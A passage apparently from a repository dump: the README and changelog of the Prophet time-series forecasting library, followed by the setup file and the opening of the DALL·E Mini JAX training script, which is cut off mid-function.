# Prophet: Automatic Forecasting Procedure ![Build](https://github.com/facebook/prophet/workflows/Build/badge.svg) [![PyPI Version](https://img.shields.io/pypi/v/prophet.svg)](https://pypi.python.org/pypi/prophet) [![PyPI Downloads Monthly](https://pepy.tech/badge/prophet/month)](https://pepy.tech/project/prophet) [![PyPI Downloads All](https://pepy.tech/badge/prophet)](https://pepy.tech/project/prophet) [![CRAN Version](https://www.r-pkg.org/badges/version/prophet)](https://CRAN.R-project.org/package=prophet) [![CRAN Downloads Monthly](https://cranlogs.r-pkg.org/badges/prophet?color=brightgreen)](https://cran.r-project.org/package=prophet) [![CRAN Downloads All](https://cranlogs.r-pkg.org/badges/grand-total/prophet?color=brightgreen)](https://cranlogs.r-pkg.org/badges/grand-total/prophet) [![Conda_Version](https://anaconda.org/conda-forge/prophet/badges/version.svg)](https://anaconda.org/conda-forge/prophet/) ----- **2023 Update:** We discuss our plans for the future of Prophet in this blog post: [facebook/prophet in 2023 and beyond](https://medium.com/@cuongduong_35162/facebook-prophet-in-2023-and-beyond-c5086151c138) ----- Prophet is a procedure for forecasting time series data based on an additive model where non-linear trends are fit with yearly, weekly, and daily seasonality, plus holiday effects. It works best with time series that have strong seasonal effects and several seasons of historical data. Prophet is robust to missing data and shifts in the trend, and typically handles outliers well. Prophet is [open source software](https://code.facebook.com/projects/) released by Facebook's [Core Data Science team](https://research.fb.com/category/data-science/). It is available for download on [CRAN](https://cran.r-project.org/package=prophet) and [PyPI](https://pypi.python.org/pypi/prophet/). ## Important links - Homepage: https://facebook.github.io/prophet/ - HTML documentation: https://facebook.github.io/prophet/docs/quick_start.html - Issue tracker: https://github.com/facebook/prophet/issues - Source code repository: https://github.com/facebook/prophet - Contributing: https://facebook.github.io/prophet/docs/contributing.html - Prophet R package: https://cran.r-project.org/package=prophet - Prophet Python package: https://pypi.python.org/pypi/prophet/ - Release blogpost: https://research.facebook.com/blog/2017/2/prophet-forecasting-at-scale/ - Prophet paper: Sean J. Taylor, Benjamin Letham (2018) Forecasting at scale. The American Statistician 72(1):37-45 (https://peerj.com/preprints/3190.pdf). ## Installation in R - CRAN ⚠️ **The CRAN version of prophet is fairly outdated. To get the latest bug fixes and updated country holiday data, we suggest installing the [latest release](#installation-in-r---latest-release).** Prophet is a [CRAN package](https://cran.r-project.org/package=prophet) so you can use `install.packages`. ```r install.packages('prophet') ``` After installation, you can [get started!](https://facebook.github.io/prophet/docs/quick_start.html#r-api) ## Installation in R - Latest release ```r install.packages('remotes') remotes::install_github('facebook/prophet@*release', subdir = 'R') ``` #### Experimental backend - cmdstanr You can also choose an experimental alternative stan backend called `cmdstanr`. Once you've installed `prophet`, follow these instructions to use `cmdstanr` instead of `rstan` as the backend: ```r # R # We recommend running this in a fresh R session or restarting your current session install.packages(c("cmdstanr", "posterior"), repos = c("https://mc-stan.org/r-packages/", getOption("repos"))) # If you haven't installed cmdstan before, run: cmdstanr::install_cmdstan() # Otherwise, you can point cmdstanr to your cmdstan path: cmdstanr::set_cmdstan_path(path = <your existing cmdstan>) # Set the R_STAN_BACKEND environment variable Sys.setenv(R_STAN_BACKEND = "CMDSTANR") ``` ### Windows On Windows, R requires a compiler so you'll need to [follow the instructions](https://github.com/stan-dev/rstan/wiki/RStan-Getting-Started) provided by `rstan`. The key step is installing [Rtools](http://cran.r-project.org/bin/windows/Rtools/) before attempting to install the package. If you have custom Stan compiler settings, install from source rather than the CRAN binary. ## Installation in Python - PyPI release Prophet is on PyPI, so you can use `pip` to install it. ```bash python -m pip install prophet ``` * From v0.6 onwards, Python 2 is no longer supported. * As of v1.0, the package name on PyPI is "prophet"; prior to v1.0 it was "fbprophet". * As of v1.1, the minimum supported Python version is 3.7. After installation, you can [get started!](https://facebook.github.io/prophet/docs/quick_start.html#python-api) ### Anaconda Prophet can also be installed through conda-forge. ```bash conda install -c conda-forge prophet ``` ## Installation in Python - Development version To get the latest code changes as they are merged, you can clone this repo and build from source manually. This is **not** guaranteed to be stable. ```bash git clone https://github.com/facebook/prophet.git cd prophet/python python -m pip install -e . ``` By default, Prophet will use a fixed version of `cmdstan` (downloading and installing it if necessary) to compile the model executables. If this is undesired and you would like to use your own existing `cmdstan` installation, you can set the environment variable `PROPHET_REPACKAGE_CMDSTAN` to `False`: ```bash export PROPHET_REPACKAGE_CMDSTAN=False; python -m pip install -e . ``` ### Linux Make sure compilers (gcc, g++, build-essential) and Python development tools (python-dev, python3-dev) are installed. In Red Hat systems, install the packages gcc64 and gcc64-c++. If you are using a VM, be aware that you will need at least 4GB of memory to install prophet, and at least 2GB of memory to use prophet. ### Windows Using `cmdstanpy` with Windows requires a Unix-compatible C compiler such as mingw-gcc. If cmdstanpy is installed first, one can be installed via the `cmdstanpy.install_cxx_toolchain` command. ## Changelog ### Version 1.1.5 (2023.10.10) #### Python - Upgraded cmdstan version to 2.33.1, enabling Apple M2 support. - Added pre-built wheels for macOS arm64 architecture (M1, M2 chips) - Added argument `scaling` to the `Prophet()` instantiation. Allows `minmax` scaling on `y` instead of `absmax` scaling (dividing by the maximum value). `scaling='absmax'` by default, preserving the behaviour of previous versions. - Added argument `holidays_mode` to the `Prophet()` instantiation. Allows holidays regressors to have a different mode than seasonality regressors. `holidays_mode` takes the same value as `seasonality_mode` if not specified, preserving the behaviour of previous versions. - Added two methods to the `Prophet` object: `preprocess()` and `calculate_initial_params()`. These do not need to be called and will not change the model fitting process. Their purpose is to provide clarity on the pre-processing steps taken (`y` scaling, creating fourier series, regressor scaling, setting changepoints, etc.) before the data is passed to the stan model. - Added argument `extra_output_columns` to `cross_validation()`. The user can specify additional columns from `predict()` to include in the final output alongside `ds` and `yhat`, for example `extra_output_columns=['trend']`. - prophet's custom `hdays` module was deprecated last version and is now removed. #### R - Updated `holidays` data based on holidays version 0.34. ### Version 1.1.4 (2023.05.30) #### Python - We now rely solely on `holidays` package for country holidays. - Upgraded cmdstan version to 2.31.0, enabling Apple M1 support. - Fixed bug with Windows installation caused by long paths. #### R - Updated `holidays` data based on holidays version 0.25. ### Version 1.1.2 (2023.01.20) #### Python - Sped up `.predict()` by up to 10x by removing intermediate DataFrame creations. - Sped up fourier series generation, leading to at least 1.5x speed improvement for `train()` and `predict()` pipelines. - Fixed bug in how warm start values were being read. - Wheels are now version-agnostic. #### R - Fixed a bug in `construct_holiday_dataframe()` - Updated `holidays` data based on holidays version 0.18. ### Version 1.1.1 (2022.09.08) - (Python) Improved runtime (3-7x) of uncertainty predictions via vectorization. - Bugfixes relating to Python package versions and R holiday objects. ### Version 1.1 (2022.06.25) - Replaced `pystan2` dependency with `cmdstan` + `cmdstanpy`. - Pre-packaged model binaries for Python package, uploaded binary distributions to PyPI. - Improvements in the `stan` model code, cross-validation metric calculations, holidays. ### Version 1.0 (2021.03.28) - Python package name changed from fbprophet to prophet - Fixed R Windows build issues to get latest version back on CRAN - Improvements in serialization, holidays, and R timezone handling - Plotting improvements ### Version 0.7 (2020.09.05) - Built-in json serialization - Added "flat" growth option - Bugfixes related to `holidays` and `pandas` - Plotting improvements - Improvements in cross validation, such as parallelization and directly specifying cutoffs ### Version 0.6 (2020.03.03) - Fix bugs related to upstream changes in `holidays` and `pandas` packages. - Compile model during first use, not during install (to comply with CRAN policy) - `cmdstanpy` backend now available in Python - Python 2 no longer supported ### Version 0.5 (2019.05.14) - Conditional seasonalities - Improved cross validation estimates - Plotly plot in Python - Bugfixes ### Version 0.4 (2018.12.18) - Added holidays functionality - Bugfixes ### Version 0.3 (2018.06.01) - Multiplicative seasonality - Cross validation error metrics and visualizations - Parameter to set range of potential changepoints - Unified Stan model for both trend types - Improved future trend uncertainty for sub-daily data - Bugfixes ### Version 0.2.1 (2017.11.08) - Bugfixes ### Version 0.2 (2017.09.02) - Forecasting with sub-daily data - Daily seasonality, and custom seasonalities - Extra regressors - Access to posterior predictive samples - Cross-validation function - Saturating minimums - Bugfixes ### Version 0.1.1 (2017.04.17) - Bugfixes - New options for detecting yearly and weekly seasonality (now the default) ### Version 0.1 (2017.02.23) - Initial release ## License Prophet is licensed under the [MIT license](LICENSE).
dalle-mini
f0be4de610285a002052024a1e096126f9452cc4
File: setup.py from setuptools import setup if __name__ == "__main__": setup() File: tools/train/train.py #!/usr/bin/env python # coding=utf-8 # Copyright 2021-2022 The HuggingFace & DALL·E Mini team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Training DALL·E Mini. Script adapted from run_summarization_flax.py """ import io import logging import os import sys import tempfile import time from dataclasses import asdict, dataclass, field from functools import partial from pathlib import Path from typing import Any, Callable, NamedTuple, Optional import datasets import flax import jax import jax.numpy as jnp import jaxlib import numpy as np import optax import transformers import wandb from datasets import Dataset from flax import core, struct, traverse_util from flax.core.frozen_dict import FrozenDict, freeze, unfreeze from flax.serialization import from_bytes, to_bytes from flax.training.common_utils import onehot from jax.experimental import PartitionSpec, maps from jax.experimental.compilation_cache import compilation_cache as cc from jax.experimental.pjit import pjit, with_sharding_constraint from scalable_shampoo.distributed_shampoo import GraftingType, distributed_shampoo from tqdm import tqdm from transformers import HfArgumentParser import dalle_mini from dalle_mini.data import Dataset from dalle_mini.model import ( DalleBart, DalleBartConfig, DalleBartTokenizer, set_partitions, ) try: from google.cloud import storage except: storage = None logger = logging.getLogger(__name__) cc.initialize_cache("jax_cache") @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": "The model checkpoint for weights initialization. " "Don't set if you want to train a model from scratch. " "W&B artifact references are supported in addition to the sources supported by `PreTrainedModel`." }, ) config_name: Optional[str] = field( default=None, metadata={ "help": "Pretrained config name or path if not the same as model_name_or_path" }, ) tokenizer_name: Optional[str] = field( default=None, metadata={ "help": "Pretrained tokenizer name or path if not the same as model_name_or_path" }, ) dtype: Optional[str] = field( default="float32", metadata={ "help": "Floating-point format in which the computations will be performed (not the model weights). Choose one of `[float32, float16, bfloat16]`." }, ) restore_state: Optional[bool] = field( default=False, metadata={ "help": "Restore optimizer and training state. Can be True (will retrieve associated wandb artifact), a local directory or a Google bucket path." }, ) dropout: Optional[float] = field( default=None, metadata={"help": "Dropout rate. Overwrites config."}, ) activation_dropout: Optional[float] = field( default=None, metadata={"help": "Activation dropout rate. Overwrites config."}, ) attention_dropout: Optional[float] = field( default=None, metadata={"help": "Attention dropout rate. Overwrites config."}, ) def __post_init__(self): if self.tokenizer_name is None: self.tokenizer_name = self.model_name_or_path assert ( self.tokenizer_name is not None ), "Tokenizer name or model name/path needs to be specified" if self.restore_state: assert self.model_name_or_path is not None and ( "/model-" in self.model_name_or_path ), "Restoring state only available with W&B artifact reference" def get_metadata(self): if self.model_name_or_path is not None and ":" in self.model_name_or_path: if jax.process_index() == 0: artifact = wandb.run.use_artifact(self.model_name_or_path) else: artifact = wandb.Api().artifact(self.model_name_or_path) return artifact.metadata else: return dict() def get_opt_state(self): with tempfile.TemporaryDirectory() as tmp_dir: # avoid multiple artifact copies if self.restore_state is True: # wandb artifact state_artifact = self.model_name_or_path.replace( "/model-", "/state-", 1 ) if jax.process_index() == 0: artifact = wandb.run.use_artifact(state_artifact) else: artifact = wandb.Api().artifact(state_artifact) if artifact.metadata.get("bucket_path"): # we will read directly file contents self.restore_state = artifact.metadata["bucket_path"] else: artifact_dir = artifact.download(tmp_dir) self.restore_state = str(Path(artifact_dir) / "opt_state.msgpack") if self.restore_state.startswith("gs://"): bucket_path = Path(self.restore_state[5:]) / "opt_state.msgpack" bucket, blob_name = str(bucket_path).split("/", 1) assert ( storage is not None ), 'Could not find google.storage. Install with "pip install google-cloud-storage"' client = storage.Client() bucket = client.bucket(bucket) blob = bucket.blob(blob_name) return blob.download_as_bytes() with Path(self.restore_state).open("rb") as f: return f.read() @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ text_column: Optional[str] = field( default="caption", metadata={ "help": "The name of the column in the datasets containing the full texts (for summarization)." }, ) encoding_column: Optional[str] = field( default="encoding", metadata={ "help": "The name of the column in the datasets containing the image encodings." }, ) dataset_repo_or_path: str = field( default=None, metadata={"help": "The dataset repository containing encoded files."}, ) train_file: Optional[str] = field( default=None, metadata={ "help": "The input training data file (glob & braceexpand acceptable)." }, ) validation_file: Optional[str] = field( default=None, metadata={ "help": "An optional input evaluation data file (glob & braceexpand acceptable)." }, ) # data loading should not be a bottleneck so we use "streaming" mode by default streaming: Optional[bool] = field( default=True, metadata={"help": "Whether to stream the dataset."}, ) use_auth_token: Optional[bool] = field( default=False, metadata={ "help": "Whether to use the authentication token for private datasets." }, ) shard_by_host: Optional[bool] = field( default=False, metadata={ "help": "Whether to shard data files by host in multi-host environments." }, ) blank_caption_prob: Optional[float] = field( default=0.0, metadata={ "help": "Probability of removing some captions for classifier-free guidance." }, ) clip_score_column: Optional[str] = field( default="clip_score", metadata={"help": "Column that containts clip score for filtering."}, ) min_clip_score: Optional[float] = field( default=None, metadata={"help": "Minimum clip score required."}, ) max_clip_score: Optional[float] = field( default=None, metadata={"help": "Maximum clip score required."}, ) filter_column: Optional[str] = field( default=None, metadata={"help": "Column that containts classes to be filtered."}, ) filter_value: Optional[str] = field( default=None, metadata={"help": "Class value to be kept during filtering."}, ) multi_eval_ds: Optional[bool] = field( default=False, metadata={ "help": "Whether to look for multiple validation datasets (local support only)." }, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": "For debugging purposes or quicker training, truncate the number of training examples." }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": "For debugging purposes or quicker training, truncate the number of evaluation examples." }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={ "help": "The number of processes to use for the preprocessing. Not used in streaming mode." }, ) overwrite_cache: bool = field( default=False, metadata={ "help": "Overwrite the cached training and evaluation sets. Not used in streaming mode." }, ) # default seed of None ensures we don't repeat the same items if script was interrupted during an epoch seed_dataset: int = field( default=None, metadata={ "help": "Random seed for the dataset that will be set at the beginning of training." }, ) def __post_init__(self): if self.dataset_repo_or_path is None: raise ValueError("Need a dataset repository or path.") @dataclass class TrainingArguments: """ Arguments pertaining to training parameters. """ output_dir: str = field( metadata={ "help": "The output directory where the model predictions and checkpoints will be written." }, ) overwrite_output_dir: bool = field( default=False, metadata={ "help": ( "Overwrite the content of the output directory. " "Use this to continue training if output_dir points to a checkpoint directory." ) }, ) do_train: bool = field(default=False, metadata={"help": "Whether to run training."}) do_eval: bool = field( default=False, metadata={"help": "Whether to run eval on the validation set."} ) per_device_train_batch_size: int = field( default=8, metadata={"help": "Batch size per data parallel device for training."}, ) per_device_eval_batch_size: Optional[int] = field( default=None, metadata={ "help": "Batch size per data parallel device for evaluation. Same as training batch size if not set." }, ) gradient_accumulation_steps: int = field( default=1, metadata={ "help": "Number of updates steps to accumulate before performing an update pass." }, ) gradient_checkpointing: bool = field( default=False, metadata={"help": "Use gradient checkpointing."} ) learning_rate: float = field( default=5e-5, metadata={"help": "The initial learning rate."} ) optim: str = field( default="distributed_shampoo", metadata={ "help": 'The optimizer to use. Can be "distributed_shampoo" (default), "adam" or "adafactor"' }, ) weight_decay: float = field( default=0.0, metadata={"help": "Weight decay applied to parameters."} ) beta1: float = field( default=0.9, metadata={"help": "Beta1 for Adam & Distributed Shampoo."}, ) beta2: float = field( default=0.999, metadata={"help": "Beta2 for for Adam & Distributed Shampoo."}, ) adam_epsilon: float = field( default=1e-8, metadata={"help": "Epsilon for AdamW optimizer."} ) max_grad_norm: float = field( default=1.0, metadata={"help": "Max gradient norm for Adafactor."} ) block_size: int = field( default=1024, metadata={"help": "Chunked size for large layers with Distributed Shampoo."}, ) preconditioning_compute_steps: int = field( default=10, metadata={"help": "Number of steps to update preconditioner."} ) skip_preconditioning_dim_size_gt: int = field( default=4096, metadata={"help": "Max size for preconditioning with Distributed Shampoo."}, ) graft_type: str = field( default="rmsprop_normalized", metadata={ "help": "The type of grafting to use. Can be 'rmsprop_normalized' (default), 'rmsprop', 'adagrad', 'adagrad_normalized', 'sgd' or 'sqrt_n'" }, ) nesterov: bool = field( default=False, metadata={"help": "Use Nesterov momentum for Distributed Shampoo."}, ) optim_quantized: bool = field( default=False, metadata={ "help": "Whether to quantize optimizer (only supported with Distributed Shampoo)." }, ) shard_shampoo_across: str = field( default="dp", metadata={ "help": "Whether to shard the optimizer across data devices (dp), model devices (mp) or both (2d)." }, ) num_train_epochs: int = field( default=3, metadata={"help": "Total number of training epochs to perform."} ) warmup_steps: int = field( default=0, metadata={"help": "Linear warmup over warmup_steps."} ) lr_decay: str = field( default=None, metadata={ "help": "Decay to be used in the learning rate scheduler. Can be None (default), linear or exponential." }, ) lr_transition_steps: int = field( default=None, metadata={ "help": "Number of transition steps associated with learning rate decay when using exponential decay." }, ) lr_decay_rate: float = field( default=None, metadata={ "help": "Decay rate associated with learning rate when using exponential decay." }, ) lr_staircase: bool = field( default=False, metadata={ "help": "Whether to use staircase or continuous learning rate when using exponential decay." }, ) lr_offset: int = field( default=0, metadata={"help": "Number of steps to offset learning rate and keep it at 0."}, ) logging_steps: int = field( default=40, metadata={"help": "Log every X updates steps."} ) eval_steps: int = field( default=400, metadata={"help": "Run an evaluation every X steps."} ) save_steps: int = field( default=4000, metadata={"help": "Save checkpoint every X updates steps."} ) log_model: bool = field( default=False, metadata={"help": "Log model to wandb at `save_steps` frequency."}, ) log_norm_steps: int = field( default=True, metadata={"help": "Log parameters and gradients norm at this frequency."}, ) log_histogram_steps: int = field( default=False, metadata={ "help": "Log parameters and gradients histograms at this frequency. Slows down training." }, ) seed_model: int = field( default=42, metadata={ "help": "Random seed for the model that will be set at the beginning of training." }, ) embeddings_only: bool = field( default=False, metadata={"help": "Train only embedding layers."} ) init_embeddings: bool = field( default=False, metadata={"help": "When training embedding layers, initialize them."}, ) wandb_entity: Optional[str] = field( default=None, metadata={"help": "The wandb entity to use (for teams)."}, ) wandb_project: str = field( default="dalle-mini", metadata={"help": "The name of the wandb project."}, ) wandb_job_type: str = field( default="Seq2Seq", metadata={"help": "The name of the wandb job type."}, ) assert_TPU_available: bool = field( default=False, metadata={"help": "Verify that TPU is not in use."}, ) use_vmap_trick: bool = field( default=True, metadata={"help": "Verify that TPU is not in use."}, ) mp_devices: Optional[int] = field( default=1, metadata={ "help": "Number of devices required for model parallelism. The other dimension of available devices is used for data parallelism." }, ) dp_devices: int = field(init=False) def __post_init__(self): if self.assert_TPU_available: assert ( jax.local_device_count() == 8 ), "TPUs in use, please check running processes" if self.output_dir.startswith("gs://"): assert ( storage is not None ), 'Could not find google.storage. Install with "pip install google-cloud-storage"' assert self.optim in [ "distributed_shampoo", "adam", "adafactor", ], f"Selected optimizer not supported: {self.optim}" if self.optim == "adafactor" and self.weight_decay == 0: self.weight_decay = None assert self.graft_type in [ "rmsprop_normalized", "rmsprop", "adagrad", "adagrad_normalized", "sgd", "sqrt_n", ], f"Selected graft type not supported: {self.graft_type}" assert self.lr_decay in [ None, "linear", "exponential", ], f"Selected learning rate decay not supported: {self.lr_decay}" if self.per_device_eval_batch_size is None: self.per_device_eval_batch_size = self.per_device_train_batch_size if self.log_norm_steps is True: self.log_norm_steps = self.logging_steps if not self.do_train: self.num_train_epochs = 1 if ( os.path.exists(self.output_dir) and os.listdir(self.output_dir) and self.do_train and not self.overwrite_output_dir ): raise ValueError( f"Output directory ({self.output_dir}) already exists and is not empty." "Use --overwrite_output_dir to overcome." ) assert self.shard_shampoo_across in [ "dp", "mp", "2d", ], f"Shard shampoo across {self.shard_shampoo_across} not supported." assert ( self.mp_devices > 0 ), f"Number of devices for model parallelism must be > 0" assert ( jax.device_count() % self.mp_devices == 0 ), f"Number of available devices ({jax.device_count()} must be divisible by number of devices used for model parallelism ({self.mp_devices})." self.dp_devices = jax.device_count() // self.mp_devices def split_params(data): """Split params between scanned and non-scanned""" flat = traverse_util.flatten_dict(unfreeze(data)) split = {"standard": {}, "scanned_encoder": {}, "scanned_decoder": {}} for k, v in flat.items(): if "FlaxBartEncoderLayers" in k: split["scanned_encoder"][k] = v elif "FlaxBartDecoderLayers" in k: split["scanned_decoder"][k] = v else: split["standard"][k] = v # remove empty keys split = {k: v for k, v in split.items() if v} for k, v in split.items(): split[k] = freeze(traverse_util.unflatten_dict(v)) return split def unsplit_params(data): flat = {} for k in ["standard", "scanned_encoder", "scanned_decoder"]: if k in data: flat.update(traverse_util.flatten_dict(unfreeze(data[k]))) return freeze(traverse_util.unflatten_dict(flat)) def trainable_params(data, embeddings_only): """Keep only trainable parameters""" if not embeddings_only: return data data = unfreeze(data) trainable = { "lm_head": data["lm_head"], "model": { "decoder": { layer: data["model"]["decoder"][layer] for layer in [ "embed_positions", "embed_tokens", "final_ln", "layernorm_embedding", ] } }, } return freeze(trainable) def init_embeddings(model, params): """Reinitialize trainable embeddings""" # Must match params in trainable_params() above trainable_keypaths = [ "lm_head.kernel", "model.decoder.embed_positions.embedding", "model.decoder.embed_tokens.embedding", "model.decoder.final_ln.bias", "model.decoder.layernorm_embedding.bias", "model.decoder.layernorm_embedding.scale", ] # Note: using private _missing_keys init_keys = {tuple(k.split(".")) for k in trainable_keypaths} model._missing_keys = init_keys return model.init_weights(model.key, model.input_shape, params=params) def main(): # See all possible arguments by passing the --help flag to this script. parser = HfArgumentParser( (ModelArguments, DataTrainingArguments, TrainingArguments) ) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file( json_file=os.path.abspath(sys.argv[1]) ) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # check arguments if training_args.mp_devices > jax.local_device_count(): assert ( data_args.seed_dataset is not None ), "Seed dataset must be provided when model is split over multiple hosts" # Make one log on every process with the configuration for debugging. logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO, ) # Setup logging, we only want one process per machine to log things on the screen. logger.setLevel(logging.INFO if jax.process_index() == 0 else logging.ERROR) if jax.process_index() == 0: datasets.utils.logging.set_verbosity_warning() transformers.utils.logging.set_verbosity_info() else: datasets.utils.logging.set_verbosity_error() transformers.utils.logging.set_verbosity_error() # Set the verbosity to info of the Transformers logger (on main process only): logger.info(f"Training/evaluation parameters {training_args}") # Load dataset dataset = Dataset( **asdict(data_args), do_train=training_args.do_train, do_eval=training_args.do_eval, ) logger.info(f"Local TPUs: {jax.local_device_count()}") logger.info(f"Global TPUs: {jax.device_count()}") # Set up wandb run if jax.process_index() == 0: wandb.init( entity=training_args.wandb_entity, project=training_args.wandb_project, job_type=training_args.wandb_job_type, config=parser.parse_args(), ) # Set up our new model config config_args = { k: getattr(model_args, k) for k in ["dropout", "activation_dropout", "attention_dropout"] if getattr(model_args, k) is not None } config_args["gradient_checkpointing"] = training_args.gradient_checkpointing if model_args.config_name: config = DalleBartConfig.from_pretrained(model_args.config_name) else: config = None # Load or create new model if model_args.model_name_or_path: model, params = DalleBart.from_pretrained( model_args.model_name_or_path, config=config, seed=training_args.seed_model, dtype=getattr(jnp, model_args.dtype), _do_init=False, ) if training_args.embeddings_only and training_args.init_embeddings: params = init_embeddings(model, params) else: model = DalleBart( config, seed=training_args.seed_model, dtype=getattr(jnp, model_args.dtype), _do_init=False, ) params = None for k, v in config_args.items(): setattr(model.config, k, v) params_shape = model.params_shape_tree # get model metadata model_metadata = model_args.get_metadata() # get PartitionSpec for model params (required to be a dict) param_spec = set_partitions(params_shape, model.config.use_scan) params_shape = freeze(params_shape) if params is not None: params = freeze(params) # Load tokenizer tokenizer = DalleBartTokenizer.from_pretrained( model_args.tokenizer_name, use_fast=True ) # Preprocessing the datasets. # We need to normalize and tokenize inputs and targets. dataset.preprocess(tokenizer=tokenizer, config=model.config) # Initialize our training dropout_rng = jax.random.PRNGKey(training_args.seed_model) # Store some constant num_epochs = training_args.num_train_epochs # batch size batch_size_per_node_per_grad_step = ( training_args.per_device_train_batch_size * jax.local_device_count() // training_args.mp_devices ) batch_size_per_node = ( batch_size_per_node_per_grad_step * training_args.gradient_accumulation_steps ) batch_size_per_step = batch_size_per_node * jax.process_count() eval_batch_size_per_node = ( training_args.per_device_eval_batch_size * jax.local_device_count() // training_args.mp_devices ) eval_batch_size_per_step = eval_batch_size_per_node * jax.process_count() len_train_dataset, len_eval_dataset = dataset.length steps_per_epoch = ( len_train_dataset // batch_size_per_node if len_train_dataset is not None else None ) num_train_steps = ( steps_per_epoch * num_epochs if steps_per_epoch is not None else None ) num_params = model.num_params(params_shape) logger.info("***** Running training *****") logger.info(f" Num examples = {len_train_dataset}") logger.info(f" Num Epochs = {num_epochs}") logger.info( f" Batch size per dp device = {training_args.per_device_train_batch_size}" ) logger.info(f" Number of devices = {jax.device_count()}") logger.info( f" Gradient accumulation steps = {training_args.gradient_accumulation_steps}" ) logger.info(f" Batch size per update = {batch_size_per_step}") logger.info(f" Model parameters = {num_params:,}") # set up wandb run if jax.process_index() == 0: # set default x-axis as 'train/step' wandb.define_metric("*", step_metric="train/step") # add interesting config parameters wandb.config.update( { "len_train_dataset": len_train_dataset, "len_eval_dataset": len_eval_dataset, "batch_size_per_step": batch_size_per_step, "num_params": num_params, "model_config": model.config.to_dict(), "num_devices": jax.device_count(), "versions": { "jax": jax.__version__, "jaxlib": jaxlib.__version__, "flax": flax.__version__, "transformers": transformers.__version__, "datasets": datasets.__version__, "wandb": wandb.__version__, "dalle_mini": dalle_mini.__version__, }, } ) # Create learning rate schedule def create_learning_rate_fn() -> Callable[[int], jnp.array]: """Create the learning rate function.""" warmup_fn = optax.linear_schedule( init_value=0.0, end_value=training_args.learning_rate, transition_steps=training_args.warmup_steps + 1, # ensure not 0 ) last_boundary = training_args.warmup_steps # offset step when resuming if training_args.lr_offset: warmup_fn = optax.join_schedules( schedules=[optax.constant_schedule(0.0), warmup_fn], boundaries=[training_args.lr_offset], ) last_boundary += training_args.lr_offset if training_args.lr_decay is None: return warmup_fn elif training_args.lr_decay == "linear": assert ( num_train_steps is not None ), "linear decay requires knowing the dataset length" decay_fn = optax.linear_schedule( init_value=training_args.learning_rate, end_value=0, transition_steps=num_train_steps - training_args.warmup_steps, ) elif training_args.lr_decay == "exponential": decay_fn = optax.exponential_decay( init_value=training_args.learning_rate, transition_steps=training_args.lr_transition_steps, decay_rate=training_args.lr_decay_rate, staircase=training_args.lr_staircase, ) schedule_fn = optax.join_schedules( schedules=[warmup_fn, decay_fn], boundaries=[last_boundary], ) return schedule_fn learning_rate_fn = create_learning_rate_fn() # create optimizer trainable_params_shape = trainable_params( params_shape, training_args.embeddings_only ) if training_args.optim == "distributed_shampoo": # parameters from https://github.com/tensorflow/lingvo/blob/03ee9d7cd50764b0424c7c863733c91fc0b053ec/lingvo/jax/optimizers.py#L729 graft_type = { "sgd": GraftingType.SGD, "adagrad": GraftingType.ADAGRAD, "rmsprop": GraftingType.RMSPROP, "rmsprop_normalized": GraftingType.RMSPROP_NORMALIZED, "sqrt_n": GraftingType.SQRT_N, "adagrad_normalized": GraftingType.ADAGRAD_NORMALIZED, }[training_args.graft_type] statistics_partition_spec = ( PartitionSpec(None, training_args.shard_shampoo_across, None) if training_args.shard_shampoo_across != "2d" else PartitionSpec(None, "dp", "mp") ) opt = distributed_shampoo( learning_rate_fn, block_size=training_args.block_size, beta1=training_args.beta1, beta2=training_args.beta2, diagonal_epsilon=1e-10, matrix_epsilon=1e-6, weight_decay=training_args.weight_decay, start_preconditioning_step=max( training_args.preconditioning_compute_steps + 1, 101 ), preconditioning_compute_steps=training_args.preconditioning_compute_steps, statistics_compute_steps=1, best_effort_shape_interpretation=True, graft_type=graft_type, nesterov=training_args.nesterov, exponent_override=0, statistics_partition_spec=statistics_partition_spec, preconditioner_partition_spec=PartitionSpec( training_args.shard_shampoo_across, None, None ) if training_args.shard_shampoo_across != "2d" else PartitionSpec( "mp" if training_args.mp_devices > training_args.dp_devices else "dp", None, None, ), num_devices_for_pjit=training_args.dp_devices, shard_optimizer_states=True, inverse_failure_threshold=0.1, moving_average_for_momentum=True, skip_preconditioning_dim_size_gt=training_args.skip_preconditioning_dim_size_gt, clip_by_scaled_gradient_norm=None, precision=jax.lax.Precision.HIGHEST, best_effort_memory_usage_reduction=training_args.optim_quantized, ) # get the real optimizer and helper functions update_fn = opt.update optimizer = {} opt_fn = {} for k, p in split_params(trainable_params_shape).items(): if "scanned" in k: p = jax.eval_shape( lambda x: jax.tree_util.tree_map(lambda y: y[0], x), p ) optimizer[k] = opt.init(p) opt_fn[k] = NamedTuple("opt_fn", pspec_fn=Any, shape_and_dtype_fn=Any)( optimizer[k].pspec_fn, optimizer[k].shape_and_dtype_fn ) optimizer[k] = optax.GradientTransformation(optimizer[k].init_fn, update_fn) elif training_args.optim == "adam": optimizer = optax.adamw( learning_rate=learning_rate_fn, b1=training_args.beta1, b2=training_args.beta2, eps=training_args.adam_epsilon, weight_decay=training_args.weight_decay, ) optimizer = {k: optimizer for k in split_params(trainable_params_shape)} elif training_args.optim == "adafactor": # We use the default parameters here to initialize adafactor, # For more details about the parameters please check https://github.com/deepmind/optax/blob/ed02befef9bf81cbbf236be3d2b0e032e9ed4a40/optax/_src/alias.py#L74 optimizer = optax.adafactor( learning_rate=learning_rate_fn, clipping_threshold=training_args.max_grad_norm, weight_decay_rate=training_args.weight_decay, ) optimizer = {k: optimizer for k in split_params(trainable_params_shape)} # get PartitionSpec for optimizer state def 